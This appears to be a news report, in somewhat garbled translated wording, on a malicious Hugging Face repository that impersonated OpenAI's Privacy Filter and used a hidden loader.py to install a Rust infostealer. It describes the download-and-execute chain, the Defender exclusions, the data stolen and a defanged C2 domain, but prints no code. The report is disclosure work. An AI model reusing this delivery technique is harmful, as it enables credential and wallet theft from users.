The malicious Hugging Face cache that made it to the forum’s trending list impersonates the OpenAI “Privacy Filter” project to deliver malware that steals information from Windows users.
The latter briefly reached #1 on Hugging Face and accumulated 244,000 downloads before the platform responded to the reports and removed it.
The Hugging Face platform allows developers and researchers to share AI models, datasets, and machine learning (ML) tools. Models are pre-trained AI programs hosted on a platform that includes weight files, configuration, and code.
Researchers from HiddenLayer, a company that specializes in protecting AI and ML models from attacks, discovered the campaign on May 7, after spotting a malicious cache called Open-OSS/privacy-filter.
“The repository scripted the official OpenAI Privacy Filter release, copied its model card almost verbatim, and sent a loader.py file that downloads and executes the infostealer malware on Windows machines,” the researchers explain.
Source: HiddenLayer
The ‘loader.py’ Python script included fake AI-related code to appear harmless, but behind the scenes, it disabled SSL authentication, decoded a base64 URL pointing to an external resource, then downloaded and executed a JSON payload containing a PowerShell command.
The command, executed in an invisible window, downloads a batch file (start.bat) that performs privilege escalation, downloads the final payload (sefirah), adds Microsoft Defender exclusions to it, and executes it.
The payload is a Rust-based infostealer that targets the following sensitive data:
- Browser data from Chromium- and Gecko-based browsers (eg, cookies, saved passwords, encryption keys, browsing data, time tokens)
- Discord tokens, local database, and master keys
- Cryptocurrency wallets and wallet browser extensions
- SSH, FTP, and VPN credentials and configuration files, including FileZilla
- Sensitive location files and wallet tokens/keys
- System information
- Screenshots of multiple monitors
The stolen data is compressed and released to the command-and-control server (C2) in recargapopular[.]com.
HiddenLayer highlights a number of anti-malware analysis features, including scanning virtual machines, sandboxes, debuggers, and analysis tools, all with the goal of avoiding analysis systems.
The exact number of victims in this incident is unclear, and researchers noted that most of the 667 accounts that liked the malicious cache on Hugging Face appeared to be generated automatically. Additionally, the download count of 244,000 may have been inflated incorrectly.
By examining those, the researchers found other caches that used the same malicious upload infrastructure. HiddenLayer researchers also observed overlap with an npm typosquatting campaign distributing WinOS 4.0 installations.
Users who downloaded files from a malicious repository are advised to rescan the machine, change all stored credentials, change cryptocurrency wallets and seed phrases, and invalidate browser sessions and tokens.
Threat actors have misused Hugging Face in the past to catch malevolent models, without the security measures of the arena.
AI has tied four zero days to a single exploit that bypasses both renderer and OS sandboxes. A wave of new exploits is coming.
At the Automated Validation Conference (May 12 & 14), see how autonomous, context-rich validation finds usability, validates controls, and closes the correction loop.
Find Your Place
